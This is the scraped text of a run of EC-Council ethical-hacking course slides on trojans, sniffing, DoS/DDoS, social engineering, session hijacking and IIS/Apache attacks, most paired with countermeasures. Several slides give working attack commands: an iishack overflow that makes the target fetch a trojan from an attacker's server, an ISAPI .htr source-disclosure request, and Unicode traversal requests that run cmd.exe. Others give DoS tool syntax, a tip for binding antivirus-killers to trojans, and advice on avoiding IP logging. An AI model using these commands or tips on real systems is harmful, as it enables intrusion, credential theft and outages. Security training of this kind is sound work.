  • 208. EC-Council Infecting via CD-ROM ~ When you place a CD in your CD-ROM drive, it automatically starts with some set up interface. An Autorun.inf file that is placed on such CD's is responsible for this action which would look like this: [autorun] open=setup.exe icon=setup.exe ~ Therefore it is quite possible that while running the real setup program a trojan could be run very easily. ~ Turn off the Auto-Start functionality by doing the following: Start button-> Settings-> Control Panel-> System-> Device Manager-> CDROM-> Properties -> Settings
  • 209. EC-Council Hacking Tool: Whack-A-Mole ~ Popular delivery vehicle for NetBus/BO servers is a game called Whack-A- Mole which is a single executable called whackamole.exe ~ Whack-A-Mole installs the NetBus/BO server and starts the program at every reboot.
  • 210. EC-Council BoSniffer ~ Soon after BO appeared, a category of cleaners emerged, claiming to be able to detect and remove BO. ~ BOSniffer turned out to be one such Trojan that in reality installed Back Orifice under the pretext of detecting and removing it. ~ Moreover, it would announce itself on the IRC channel #BO_OWNED with a random username.
  • 211. EC-Council Hacking Tool: Firekiller 2000 ~ FireKiller 2000 will kill (if executed) any resistant protection software. ~ For instance, if you have Norton Anti-virus auto scan in your taskbar, and ATGuard Firewall activated, this program will KILL both on execution, and makes the installations of both UNUSABLE on the hard drive; which would require re-installation to restore. ~ It works with all major protection software like AtGuard, Conseal, Norton Anti-Virus, McAfee Anti-Virus etc. Tip: Use it with an exe binder to bind it to a trojan before binding this file (trojan and firekiller 2000) to some other dropper.
  • 212. EC-Council ICMP Tunneling ~ Covert Channels are methods in which an attacker can hide the data in a protocol that is undetectable. ~ Covert Channels rely on techniques called tunneling, which allows one protocol to be carried over another protocol. ~ ICMP tunneling is a method of using ICMP echo- request and echo-reply as a carrier of any payload an attacker may wish to use, in an attempt to stealthily access, or control a compromised system.
  • 213. EC-Council Hacking Tool: Loki (www.phrack.com) ~Loki was written by daemon9 to provide shell access over ICMP making it much more difficult to detect than TCP or UDP based backdoors. ~As far as the network is concerned, a series of ICMP packets are shot back and forth: Ping, Pong-response. As far as the attacker is concerned, commands can be typed into the loki client and executed on the server.
  • 214. EC-Council Loki Countermeasures ~ Configure your firewall to block ICMP incoming and outgoing echo packets. ~ Blocking ICMP will disable ping request and may cause inconvenience to users. ~ So you need to carefully decide on security Vs convenience. ~ Loki also has the option to run over UDP port 53 (DNS queries and responses.)
  • 215. EC-Council Reverse WWW Shell - Covert channels using HTTP ~ Reverse WWW shell allows an attacker to access a machine on your internal network from the outside. ~ The attacker must install a simple trojan program on a machine in your network, the Reverse WWW shell server. ~ On a regular basis, usually 60 seconds, the internal server will try to access the external master system to pick up commands. ~ If the attacker has typed something into the master system, this command is retrieved and executed on the internal system. ~ Reverse WWW shell uses standard http protocol. ~ It looks like internal agent is browsing the web.
  • 216. EC-Council Backdoor Countermeasures ~ Most commercial ant-virus products can automatically scan and detect backdoor programs before they can cause damage (Eg. before accessing a floppy, running exe or downloading mail) ~ An inexpensive tool called Cleaner (http://www.moosoft.com/cleanet.html) can identify and eradicate 1000 types of backdoor programs and trojans. ~ Educate your users not to install applications downloaded from the internet and e-mail attachments.
  • 220. EC-Council Inzider - Tracks Processes and Ports http://ntsecurity.nu/cgi-bin/download/inzider.exe.pl ~ This is a very useful tool that lists processes in your Windows system and the ports each one listen on. ~ For instance, under Windows NT/2K, BO2K injects itself into other processes, so it is not visible in the Task Manager as a separate process. ~ When you run Inzider, you will see the port BO2K has bound in its host process
  • 221. EC-Council Hacking Tool: Senna Spy http://sennaspy.cjb.net/ ~ Senna Spy Generator 2.0 is a trojan generator. Senna Spy Generator is able to create a Visual Basic source code for a trojan based on a few options. ~ This trojan is compiled from generated source code, anything could be changed in it.
  • 222. EC-Council Hacking Tool: Hard Disk Killer (HDKP4.0) http://www.hackology.com/programs/hdkp/ginfo.shtml ~ The Hard Drive Killer Pro series of programs offer one the ability to fully and permanently destroy all data on any given Dos or Win3.x/9x/NT/2000 based system. In other words 90% of the PCs worldwide. ~ The program, once executed, will start eating up the hard drive, and or infect and reboot the hard drive within a few seconds. ~ After rebooting, all hard drives attached to the system would be formatter (in an un recoverable manner) within only 1 to 2 seconds, regardless of the size of the hard drive.
  • 223. EC-Council System File Verification ~Windows 2000 introduced Windows File Protection (WFP) which protects system files that were installed by Windows 2000 setup program from being overwritten. ~The hashes in this file could be compared with the SHA-1 hashes of the current system files to verify their integrity against the 'factory originals‘ ~sigVerif.exe utility can perform this verification process.
  • 224. EC-Council Tool: Tripwire ~ Tripwire will automatically calculate cryptographic hashes of all key system files or any file that you want to monitor for modifications. ~ Tripwire software works by creating a baseline “snapshot” of the system ~ It will periodically scan those files, recalculate the information, and see if any of the information has changed. If there is a change an alarm is raised.
  • 225. EC-Council Tool: Beast ~ Beast is a powerful Remote Administration Tool (AKA trojan) built with Delphi 7. ~ One of the distinct features of the Beast is that is an all-in-one trojan (client, server and server editor are stored in the same application). ~ An important feature of the server is that is using the injecting technology.
  • 226. EC-Council Summary ~ Trojans are malicious pieces of code that carry cracker software to a target system ~ Trojans are used primarily to gain and retain access on the target system ~ Trojans often reside deep in the system and make registry changes that allow it to meet its purpose as a remote administration tool ~ Popular Trojans include back orifice, netbus, subseven, beast etc. ~ Awareness and preventive measures are the best defense against Trojans.
  • 228. EC-Council Module Objective ~ Overview of Sniffers ~ Understanding Sniffers from a cracker perspective ~ Comprehending Active and Passive Sniffing ~ ARP Spoofing and Redirection ~ DNS and IP Sniffing and Spoofing ~ HTTPS Sniffing ~ Illustration of various tools used in the above context
  • 229. EC-Council Sniffers – An Introduction ~ Sniffers monitor network data. ~ A sniffer can be a self-contained software program or a hardware device with the appropriate software or firmware programming. ~ Sniffers usually act as network probes or "snoops" -- examining network traffic but not intercepting or altering it. ~ Some sniffers work only with TCP/IP packets, but the more sophisticated tools can work with many other protocols and at lower levels such as the Ethernet frame.
  • 230. EC-Council Security Concern ~ Users of computer networks unwittingly disclose sensitive information about themselves through the use of insecure software, and protocols. ~ Standard implementations of widely adopted protocols such as Windows file sharing (CIFS/SMB), telnet, POP3, HTTP and FTP transmit login passwords in clear text, exposing an extremely large segment of the internet population to sniffing-related attacks.
  • 232. EC-Council Tool: Snort ~There are three main modes in which Snort can be configured: sniffer, packet logger, and network intrusion detection system. ~Sniffer mode simply reads the packets off of the network and displays them for you in a continuous stream on the console. ~Packet logger mode logs the packets to the disk. ~Network intrusion detection mode is the most complex and configurable configuration, allowing Snort to analyze network traffic for matches against a user defined rule set
  • 233. EC-Council Tool: Windump ~ WinDump is the porting to the Windows platform of tcpdump, the most used network sniffer/analyzer for UNIX.
  • 237. EC-Council EtherFlood ~ EtherFlood floods a switched network with Ethernet frames with random hardware addresses. ~ The effect on some switches is that they start sending all traffic out on all ports so that the attacker is able to sniff all traffic on the network.
  • 238. EC-Council dsniff ~ dsniff is a collection of tools for network auditing and penetration testing. ~ dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.). ~ arpspoof, dnsspoof, and macof facilitate the interception of network traffic normally unavailable to an attacker (e.g, due to layer-2 switching). ~ sshmitm and webmitm implement active monkey-in- the-middle attacks against redirected SSH and HTTPS sessions by exploiting weak bindings in ad-hoc PKI.
  • 239. EC-Council ARP Spoofing 1. Configure IP Forwarding 4. Sniff the traffic from the link 2. Send fake ARP response to re-map default router IP to attacker’s MAC 3. Victim sends traffic destined for outside world based on poisoned ARP table entry 5. Packets are forwarded from attacker’s machine to the actual default router for delivery to the outside world Si Si
  • 240. EC-Council Sniffing HTTPS and SSH ~ SSL connection uses a session key to encrypt all data sent by server and client. ~ SSH is based on the public key encryption idea. ~ With SSH a session key is transmitted in an encrypted fashion using a public key stored on the server. ~ As such, these protocols – SSL and SSH are sound from a security standpoint. The problem however lies in the basis of these protocols – namely trust certificates and public keys.
  • 241. EC-Council Man in the Middle Attack
  • 242. EC-Council Macof, MailSnarf, URLSnarf, WebSpy ~Macof floods the local network with random MAC addresses, causing some switches to fail open in repeating mode, and thereby facilitates sniffing. ~Mailsnarf is capable of capturing and outputting SMTP mail traffic that is sniffed on the network. ~urlsnarf is a neat tool for monitoring Web traffic. ~Webspy allows the user to see all the WebPages visited by the victim.
  • 245. EC-Council Mac Changer ~ MAC changer is a Linux utility for setting a specific MAC address for a network interface. ~ It enables the user to set the MAC address randomly. It allows specifying the MAC of another vendor or setting another MAC of the same vendor. ~ The user can also set a MAC of the same kind (e.g.: wireless card). ~ It offers a choice of vendor MAC list (more than 6200 items) to choose from.
  • 248. EC-Council DNS Sniffing and Spoofing ~ DNS Spoofing is said to have occurred when a DNS entry points to another IP instead of the legitimate IP address. ~ When an attacker wants to poison a DNS cache, he will use a faulty DNS – which can be his own domain running a hacked DNS server. The DNS server is termed as hacked because the IP address records are manipulated to suit the attacker’s needs.
  • 249. EC-Council WinDNSSpoof ~ This tool is a simple DNS ID Spoofer for Windows 9x/2K. ~ In order to use it you must be able to sniff traffic of the computer being attacked. ~ Usage : wds -h Example : wds -n www.microsoft.com -i 216.239.39.101 -g 00-00-39-5c-45-3b
  • 250. EC-Council Summary ~ A sniffer is a piece of software that captures the traffic flowing into and out of a computer attached to a network. ~ A sniffer attack is commonly used to grab logins and passwords that are traveling around on the network. ~ Sniffing can be active or passive. ~ Popular attack methods include man in the middle attack and session hijacking ~ On switched networks, MAC flooding and ARP spoofing is carried out.
  • 252. EC-Council Module Objective ~ What is a Denial Of Service Attack? ~ What is a Distributed Denial Of Service Attack? ~ Why are they difficult to protect against? ~ Types of denial of service attacks ~ Tools for running DOS attacks ~ Tools for running DDOS attacks ~ Denial of Service Countermeasures
  • 253. EC-Council It’s Real On February 6th, 2000, Yahoo portal was shut down for 3 hours. Then retailer Buy.com Inc. (BUYX) was hit the next day, hours after going public. By that evening, eBay (EBAY), Amazon.com (AMZN), and CNN (TWX) had gone dark. And in the morning, the mayhem continued with online broker E*Trade (EGRP) and others having traffic to their sites virtually choked off. (Business Week Online, 12 February 2000)
  • 254. EC-Council What is a Denial Of Service Attack? ~ A denial of service attack (DOS) is an attack through which a person can render a system unusable or significantly slow down the system for legitimate users by overloading the resources, so that no one can access it. ~ If an attacker is unable to gain access to a machine, the attacker most probably will just crash the machine to accomplish a denial of service attack.
  • 255. EC-Council Types of denial of service attacks ~ There are several general categories of DoS attacks. ~ Popularly, the attacks are divided into three classes: • bandwidth attacks, • protocol attacks, and • logic attacks.
  • 256. EC-Council What is Distributed Denial of Service Attacks? ~An attacker launches the attack using several machines. In this case, an attacker breaks into several machines, or coordinates with several zombies to launch an attack against a target or network at the same time. ~This makes it difficult to detect because attacks originate from several IP addresses. ~If a single IP address is attacking a company, it can block that address at its firewall. If it is 30000 this is extremely difficult.
  • 257. EC-Council Ping of Death ~An attacker sends a large ping packet to the victim's machine. Most OS do not know what to do with a packet that is larger than the maximum size, it causes the OS to hang or crash. Example: Ping of Death causes blue screen of death in Windows NT. ~Ping of Death uses ICMP to cause a denial of service attack against a given system.
  • 258. EC-Council Hacking Tool: SSPing ~ SSPing is a DoS tool. ~ SSPing program sends the victim's computer a series of highly fragmented, oversized ICMP data packets. ~ The computer receiving the data packets lock when it tries to put the fragments together. ~ The result is a memory overflow which in turn causes the machine to stop responding. ~ Affects Win 95/NT and Mac OS
  • 259. EC-Council Hacking Tool: Land Exploit ~ Land Exploit is a DoS attack in which a program sends a TCP SYN packet where the target and source addresses are the same and port numbers are the same. ~ When an attacker wants to attack a machine using the land exploit, he sends a packet in which the source/destination ports are the same. ~ Most machines will crash or hang because they do not know how to handle it.
  • 260. EC-Council Hacking Tool: Smurf ~ Smurf is a DoS attack involving forged ICMP packets sent to a broadcast address. ~ Attackers spoof the source address on ICMP echo requests and sending them to an IP broadcast address. This causes every machine on the broadcast network to receive the reply and respond back to the source address that was forged by the attacker. 1. An attacker starts a forged ICMP packet-source address with broadcast as the destination. 2. All the machines on the segment receives the broadcast and replies to the forged source address. 3. This results in DoS due to high network traffic.
  • 261. EC-Council SYN Flood ~ SYN attack floods a targeted system with a series of SYN packets. ~ Each packet causes the targeted system to issue a SYN- ACK response, while the targeted system waits for the ACK that follows the SYN-ACK, it queues up all outstanding SYN-ACK responses on what is known as a backlog queue. ~ SYN-ACKs are moved of the queue only when an ACK comes back or when an internal timer (which is set at relatively long intervals) terminates the TCP three-way handshake ~ Once the queue is full, the system will ignore all incoming SYN requests, making the system unavailable for legitimate users.
  • 262. EC-Council Hacking Tool: WinNuke ~ WinNuke works by sending a packet with "Out of band" data to port 139 of the target host. First off, port 139 is the NetBIOS port and does not accept packets unless the flag OOB is set in incoming packet. ~ The OOB stands for Out Of Band. When the victim's machine accepts this packet, it causes the computer to crash a blue screen. ~ Because the program accepting the packets does not know how to appropriately handle Out Of Band data, it crashes.
  • 263. EC-Council Hacking Tool: Jolt2 ~ Jolt2 enables users across different networks to send IP fragment-driven denial of service attacks against NT/2000 by making victim's machine utilize 100% of its CPU when it attempts to process the illegal packets. c: > jolt2 1.2.3.4 -p 80 4.5.6.7 ~ The above command launches the attack from the attacker's machine with a spoofed IP address of 1.2.3.4 against the IP address 4.5.6.7 ~ The victim's machine CPU resources reach 100% causing the machine to lock up.
  • 264. EC-Council Hacking Tool: Bubonic.c ~ Bubonic.c is a DOS exploit that can be run against Windows 2000 machines. ~ It works by randomly sending TCP packets with random settings with the goal of increasing the load of the machine, so that it eventually crashes. c: > bubonic 12.23.23.2 10.0.0.1 100
  • 265. EC-Council Hacking Tool: Targa ~ Targa is a program that can be used to run 8 different Denial Of Service attacks. ~ The attacker has the option to either launch individual attacks or to try all the attacks until it is successful. ~ Targa is a very powerful program and can do a lot of damage to a company's network.
  • 266. EC-Council Tools for running DDOS Attacks ~ The main tools for running DDOS attacks are: 1. Trinoo 2. TFN 3. Stacheldraht 4. Shaft 5. TFN2K 6. mstream
  • 267. EC-Council DDOS - Attack Sequence ~ All of the DDOS tools follow this sequence. ~ Mass-intrusion Phase - automated tools identify potential systems with weaknesses; then root compromise them and install the DDOS software on them. These are the primary victims. ~ DDOS Attack Phase - The compromised systems are used to run massive DOS against a victim site.
  • 268. EC-Council Trinoo ~ Trinoo (TrinOO) was the first DDOS tool to be discovered. ~ Found in the wild (binary form) on Solaris 2.x systems compromised by buffer overrun bug in RPC services: statd, cmsd, ttdbserverd. ~ Trinoo daemons were UDP based, password protected remote command shells running on compromised systems. DDOS Structure ~ The attacker controls one or more master servers by password protected remote command shells. ~ The master systems control multiple daemon systems. Trinoo calls the daemons "Bcast" hosts. ~ Daemons fire packets at the target specified by the attacker.
  • 269. EC-Council Hacking Tool: Trinoo ~ Trinoo is a DDOS attack tool. It uses the following TCP Ports: • Attacker to master: 27665/tcp • Master to daemon: 27444/udp • Daemon to master: 31335/udp ~ Daemons reside on the systems that launch that the attack, and masters control the daemon systems. ~ Since Trinoo uses TCP, it can be easily detected and disabled.
  • 270. EC-Council TFN ~ Could be thought of as 'son of trinoo' ~ Improved on some of the weaknesses of trinoo by adding different types of attacks that could be mounted against the victim site. ~ Structured like trinoo with attackers, clients (masters) and daemons. ~ Initial system compromise allows the TFN programs to be installed.
  • 271. EC-Council Hacking Tool: TFN2K http://packetstorm.security.com/distributed ~ TFN2K is a DDOS program which runs in distributed mode. There are two parts to the program: client and server. ~ The server (also known as zombies) runs on a machine in listening mode and waits for commands from the client. • Running the server • #td • Running the client • #tn -h 23.4.56.4 -c8 -i 56.3.4.5 ~ This command starts an attack from 23.4.56.4 to the victim's computer 56.3.4.5
  • 272. EC-Council Hacking Tool: Stacheldraht ~ Stacheldraht combines the features of TFN and Trinoo but adds encryption layer between daemons. ~ Stacheldraht uses TCP and ICMP on the following ports: Client to Handler: 16660 TCP Handler to and from agents: 65000 ICMP
  • 273. EC-Council Preventing DoS Attacks ~ You could do the following things to minimize the DoS attack: 1. Effective robust design 2. Bandwidth limitations 3. Keep systems patched 4. Run the least amount of services 5. Allow only necessary traffic 6. Block IP addresses ~ Due to the power of DoS attacks and the way they work, there is nothing that can be done to prevent a Dos attack entirely.
  • 274. EC-Council Preventing the DDoS 1. Keep the network secure 2. Install IDS (Intrusion Detection System) 3. Use scanning tools 4. Run zombie tools IDS pattern matching technologies have a database of signatures. When it finds packets that have a given pattern, it sets off an alarm.
  • 275. EC-Council Common IDS systems 1. Shareware 2. Snort 3. Shadow 4. Courtney 5. Commercial 6. ISS RealSecure 7. Axent NetProwler 8. Cisco Secure ID (Net Ranger) 9. Network Flight Recorder 10. Network Security Wizard's Dragon
  • 276. EC-Council Use Scanning Tools ~ There are several tools available which could detect whether a system is being used as a DDOS server. The following tools can detect TFN2K, Trinoo and Stacheldraht. ~ Find_DDOS • (http://ftp.cert.org.tw/tools/Security_Scanner/find_ddos/) ~ SARA • (http://www.cromwell-intl.com/security/468-netaudit.html) ~ DDoSPing v2.0 • (http://is-it-true.org/pt/ptips19.shtml) ~ RID • (http://staff.washington.edu/dittrich/misc/ddos/) ~ Zombie Zapper • (http://razor.bindview.com/tools/zombiezapper_form.shtml)
  • 277. EC-Council Summary ~ Denial of Service is a very commonly used attack methodology. ~ Distributed Denial Of Service using a multiplicity of Zombie machines is an often seen attack methodology. ~ There are various tools available for attackers to perpetrate DOS attacks. ~ Protection against DOS is difficult due to the very nature of the attacks. ~ Different scanning tools are available to aid detection and plugging of vulnerabilities leading to DOS
  • 279. EC-Council Module Objective ~ What is Social Engineering? ~ Common Types of Attacks ~ Social Engineering by Phone ~ Dumpster Diving ~ Online Social Engineering ~ Reverse Social Engineering ~ Policies and Procedures ~ Employee Education
  • 280. EC-Council What is Social Engineering? ~ Social Engineering is the human side of breaking into a corporate network. ~ Companies with authentication processes, firewalls, virtual private networks and network monitoring software are still wide open to attacks ~ An employee may unwittingly give away key information in an email or by answering questions over the phone with someone they don't know or even by talking about a project with co workers at a local pub after hours.
  • 281. EC-Council Art of Manipulation. ~ Social Engineering is the acquisition of sensitive information or inappropriate access privileges by an outsider, based upon building of inappropriate trust relationships with outsiders. ~ The goal of a social engineer is to trick someone into providing valuable information or access to that information. ~ It preys on qualities of human nature, such as the desire to be helpful, the tendency to trust people and the fear of getting in trouble.
  • 282. EC-Council Human Weakness ~ People are usually the weakest link in the security chain. ~ A successful defense depends on having good policies in place and educating employees to follow the policies. ~ Social Engineering is the hardest form of attack to defend against because it cannot be defended with hardware or software alone.
  • 283. EC-Council Common Types of Social Engineering ~ Social Engineering can be broken into two types: human based and computer based 1. Human-based Social Engineering refers to person to person interaction to retrieve the desired information. 2. Computer based Social Engineering refers to having computer software that attempts to retrieve the desired information.
  • 284. EC-Council Human based - Impersonation Human based social engineering techniques can be broadly categorized into: ~ Impersonation ~ Posing as Important User ~ Third-person Approach ~ Technical Support ~ In Person • Dumpster Diving • Shoulder Surfing
  • 287. EC-Council Computer Based Social Engineering ~ These can be divided into the following broad categories: • Mail / IM attachments • Pop-up Windows • Websites / Sweepstakes • Spam Mail
  • 288. EC-Council Reverse Social Engineering ~ More advanced method of gaining illicit information is known as "reverse social engineering" ~ This is when the hacker creates a persona that appears to be in a position of authority so that employees will ask him for information, rather than the other way around. ~ The three parts of reverse social engineering attacks are sabotage, advertising and assisting.
  • 289. EC-Council Policies and Procedures ~ Policy is the most critical component to any information security program. ~ Good policies and procedures are not effective if they are not taught and reinforced to the employees. ~ They need to be taught to emphasize their importance. After receiving training, the employee should sign a statement acknowledging that they understand the policies.
  • 290. EC-Council Security Policies - Checklist ~ Account Setup ~ Password change policy ~ Help desk procedures ~ Access Privileges ~ Violations ~ Employee identification ~ Privacy Policy ~ Paper documents ~ Modems ~ Physical Access Restrictions ~ Virus control
  • 291. EC-Council Summary ~ Social Engineering is the human side of breaking into a corporate network. ~ Social Engineering involves acquiring sensitive information or inappropriate access privileges by an outsider. ~ Human-based Social Engineering refers to person to person interaction to retrieve the desired information. ~ Computer based Social Engineering refers to having computer software that attempts to retrieve the desired information ~ A successful defense depends on having good policies in place and diligent implementation.
  • 293. EC-Council Module Objective ~ Spoofing Vs Hijacking ~ Types of session hijacking ~ TCP/IP concepts ~ Performing Sequence prediction ~ ACK Storms ~ Session Hijacking Tools
  • 294. EC-Council Understanding session hijacking ~ Understanding the flow of message packets over the Internet by dissecting the TCP stack. ~ Understanding the security issues involved in the use of IPv4 standard ~ Familiarizing with the basic attacks possible due to the IPv4 standard.
  • 295. EC-Council Spoofing Vs Hijacking A spoofing attack is different from a hijack in that an attacker is not actively taking another user offline to perform the attack. he pretends to be another user or machine to gain access. Bob (Victim) Server I am Bob!
  • 296. EC-Council Spoofing Vs Hijacking With Hijacking an attacker is taking over an existing session, which means he is relying on the legitimate user to make a connection and authenticate. Then take over the session. I am Bob! Bob (Victim) Attacker Server Bob logs on to server Dial in
  • 297. EC-Council Steps in Session Hijacking 1. Tracking the session 2. Desynchronizing the connection 3. Injecting the attacker’s packet
  • 298. EC-Council Types of session Hijacking There are two types of hijacking attacks: ~ Active • In an active attack, an attacker finds an active session and takes over. ~ Passive • With a passive attack, an attacker hijacks a session, but sits back and watches and records all of the traffic that is being sent forth.
  • 299. EC-Council TCP Concepts 3 Way Handshake 1. Bob Initiates a connection with the server. Bob sends a packet to the server with SYN bit set. 2. The server receives this packet and sends back a packet with the SYN bit and an ISN (Initial Sequence Number) for the server. 3. Bob sets the ACK bit acknowledging the receipt of the packet and increments the sequence number by 1 4. The two machines have successfully established a session. 1 2 3
  • 300. EC-Council Sequence Numbers ~ Sequence Numbers are very important to provide reliable communication but they are also crucial to hijacking a session. ~ Sequence numbers are a 32-bit counter, which means the value can be any of over 4 billion possible combinations. ~ The sequence numbers are used to tell the receiving machine what order the packets should go in when they are received. ~ Therefore an attacker must successfully guess the sequence number to hijack a session.
  • 301. EC-Council Programs that perform Session Hijacking There are several programs available that perform session hijacking. Following are a few that belongs to this category: • Juggernaut • Hunt • TTY Watcher • IP Watcher • T-Sight
  • 302. EC-Council Hacking Tool: Juggernaut ~ Juggernaut is a network sniffer that can be used to hijack TCP sessions. It runs on Linux Operating systems. ~ Juggernaut can be set to watch for all network traffic or it can be given a keyword like password to look out for. ~ The main function of this program is to maintain information about various session connections that are occurring on the network. ~ The attacker can see all the sessions and he can pick a session he wants to hijack.
  • 303. EC-Council Hacking Tool: Hunt http://lin.fsid.cvut.cz/^kra/index.html ~ Hunt is a program that can be used to listen, intercept, and hijack active sessions on a network. ~ Hunt Offers: • Connection management • ARP Spoofing • Resetting Connection • Watching Connection • MAC Address discovery • Sniffing TCP traffic
  • 304. EC-Council Hacking Tool: TTY Watcher http://www.cerias.purdue.edu ~ TTY-watcher is a utility to monitor and control users on a single system. ~ Sharing a TTY. Anything the user types into a monitored TTY window will be sent to the underlying process. In this way you are sharing a login session with another user. ~ After a TTY has been stolen, it can be returned to the user as though nothing happened. (Available only for Sun Solaris Systems.)
  • 305. EC-Council Hacking Tool: IP watcher http://engarde.com ~ IP watcher is a commercial session hijacking tool that allows you to monitor connections and has active countermeasures for taking over a session. ~ The program can monitor all connections on a network allowing an attacker to display an exact copy of a session in real-time, just as the user of the session sees the data.
  • 306. EC-Council T-Sight http://engarde.com ~ T-Sight, an advanced intrusion investigation and response tool for Windows NT and Windows 2000 can assist you when an attempt at a break-in or compromise occurs. ~ With T-sight, you can monitor all your network connections (i.e. traffic) in real-time and observe the composition of any suspicious activity that takes place. ~ T-Sight has the capability to hijack any TCP sessions on the network. ~ Due to security reasons Engarde Systems licenses this software to pre-determined IP address.
  • 308. EC-Council Dangers posed by Hijacking 1. Most computers are vulnerable 2. Little can be done to protect against it 3. Hijacking is simple to launch 4. Most countermeasures do not work 5. Hijacking is very dangerous.
  • 309. EC-Council Protecting against Session Hijacking 1. Use Encryption 2. Use a secure protocol 3. Limit incoming connections 4. Minimize remote access 5. Have strong authentication.
  • 310. EC-Council Summary ~ In the case of a session hijacking an attacker relies on the legitimate user to connect and authenticate and then take over the session. ~ In spoofing attack, the attacker pretends to be another user or machine to gain access. ~ Successful session hijacking is extremely difficult and only possible when a number of factors are under the attacker's control. ~ Session hijacking can be active or passive in nature depending on the degree of involvement of the attacker in the attack. ~ A variety of tools exist to aid the attacker in perpetrating a session hijack. ~ Session Hijacking could be very dangerous and there is a need for implementing strict countermeasures.
  • 312. EC-Council Module Objective ~Introduction to Web Servers ~Popular Web Servers and common Vulnerabilities ~Apache Web Server Security ~Sun ONE Web Server Security ~IIS Server Security ~Attacks against Web Servers ~Tools used in Attack ~Countermeasures
  • 313. EC-Council How Web Servers Work 1. The browser breaks the URL into three parts: 1. The protocol ("http") 2. The server name ("www.website.com") 3. The file name ("webpage.html") 2. The browser communicates with a name server, which translates the server name, www.website.com, into an IP address 3. The browser then forms a connection to the Web server at that IP address on port 80. 4. Following the HTTP protocol, the browser sends a GET request to the server, asking for the file http://webpage.html. 5. The server sends the HTML text for the Web page to the browser. 6. The browser reads the HTML tags and formats the page onto the screen.
  • 314. EC-Council Popular Web Servers and Common Security Threats ~ Apache Web Server ~ IIS Web Server ~ Sun ONE Web Server ~ Nature of Security Threats in a Web Server Environment. • Bugs or Web Server Misconfiguration. • Browser-Side or Client Side Risks. • Sniffing • Denial of Service Attack.
  • 315. EC-Council Apache Vulnerability ~ The Apache Week tracks the vulnerabilities in Apache Server. Even Apache has its share of bugs and fixes. ~ For instance, consider the vulnerability which was found in the Win32 port of Apache 1.3.20. • Long URLs passing through the mod_negative, mod_dir and mode_autoindex modules could cause Apache to list directory contents. • The concept is simple but requires a few trial runs. • A URL with a large number of trailing slashes: – /cgi-bin /////////////// / // / / / / / // / / / could produce directory listing of the original directory.
  • 316. EC-Council Attacks against IIS ~ IIS is one of the most widely used Web server platforms on the Internet. ~ Microsoft's Web Server has been the frequent target over the years. ~ It has been attacked by various vulnerabilities. Examples include: • ::$DATA vulnerability • showcode.asp vulnerability • Piggy backing vulnerability • Privilege command execution • Buffer Overflow exploits (IIShack.exe)
  • 317. EC-Council IIS Components ~ IIS relies heavily on a collection of DLLs that work together with the main server process, inetinfo.exe, to provide various capabilities. ~ Example: Server side scripting, Content Indexing, Web Based printing etc. ~ This architecture provides attackers with different functionality to exploit via malicious input.
  • 318. EC-Council ISAPI DLL Buffer Overflows ~ One of the most extreme security vulnerabilities associated with ISAPI DLLs is the buffer overflow. ~ In 2001, IIS servers were ravaged by versions of the Code Red and Nimda worms which were both based on buffer overflow exploits.
  • 319. EC-Council IPP Printer Overflow ~ There is a buffer overflow in IIS within the ISAPI filter that handles .printer files (c:winntsystem32msw3prt.dll) that provides support for the Internet Printing Protocol (IPP) ~ IPP enables the web-based control of various aspects of networked printers. ~ The vulnerability arises when a buffer of approximately 420 bytes is sent within the HTTP host. GET /NULL.printer HTTP/1.0 HOST: [buffer]
  • 320. EC-Council Hacking Tool: IISHack.exe ~ iishack.exe overflows a buffer used by IIS http daemon, allowing for arbitrary code to be executed. c: iishack www.yourtarget.com 80 www.yourserver.com/thetrojan.exe ~ www.yourtarget.com is the IIS server you're hacking,80 is the port its listening on, www.yourserver.com is some webserver with your trojan or custom script (your own, or another), and /thetrojan.exe is the path to that script.
  • 321. EC-Council IPP Buffer Overflow Countermeasures ~ Install latest service pack from Microsoft. ~ Remove IPP printing from IIS Server ~ Install firewall and remove unused extensions ~ Implement aggressive network egress filtering ~ Use IISLockdown and URLScan utilities ~ Regularly scan your network for vulnerable servers
  • 322. EC-Council ISAPI DLL Source disclosures ~ Microsoft IIS 4.0 and 5.0 can be made to disclose fragments of source code which should otherwise be in accessible. ~ This is done by appending "+.htr" to a request for a known .asp (or .asa, .ini, etc) file. ~ appending this string causes the request to be handled by ISM.DLL, which then strips the ‘+.htr’ string and may disclose part or all of the source of the .asp file specified in the request.
  • 323. EC-Council ISAPI.DLL Exploit ~ Here's a sample file called htr.txt that you can pipe through a netcat to exploit the ISAPI.DLL vulnerability. • GET /site1/global.asa+.htr HTTP/1.0 • [CRLF] • [CRLF] ~ Piping through netcat connected to a vulnerable server produces the following results: • c: >nc -vv www.victim.com 80 <htr.txt • HTTP/1.1 200 OK • Server: Microsoft -IIS /5.0 • <!--filename = global.asa --> ("Profiles_ConnectionString") • "DSN=Profiles; UID=Company_user; • password=secret" Password Revealed
  • 324. EC-Council IIS Directory Traversal ~ The vulnerability results because of a canonicalization error affecting CGI scripts and ISAPI extensions (.ASP is probably the best known ISAPI-mapped file type.) ~ canonicalization is the process by which various equivalent forms of a name can be resolved to a single, standard name. ~ For example, "%c0%af" and "%c1%9c" are overlong representations for ?/? and ?? ~ Thus, by feeding the HTTP request like the following to IIS, arbitrary commands can be executed on the server: ~ GET/scripts/..%c0%af../winnt/system32/cmd.exe?/c+ dir=c: HTTP/1.0
  • 325. EC-Council Unicode ~ ASCII characters for the dots are replaced with hexadecimal equivalent (%2E). ~ ASCII characters for the slashes are replaced with Unicode equivalent (%c0%af). ~ Unicode 2.0 allows multiple encoding possibilities for each characters. ~ Unicode for "/": 2f, c0af, e080af, f08080af, f8808080af, ..... ~ Overlong Unicode are NOT malformed, but not allowed by a correct Unicode encoder and decoder. ~ Maliciously used to bypass filters that only check short Unicode.
  • 326. EC-Council IIS Logs ~ IIS logs all the visits in log files. The log file is located at <%systemroot%>logfiles ~ Be careful. If you don't use proxy, then your IP will be logged. ~ This command lists the log files: http://victim.com/scripts/..%c0%af../..%c0%af../..%c0 %af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..% c0%af../winnt/system32/cmd.exe?/c+dir+C:Winntsy stem32LogfilesW3SVC1
  • 327. EC-Council Hacking Tool: IISxploit.exe This tool automates directory traversal exploit in IIS
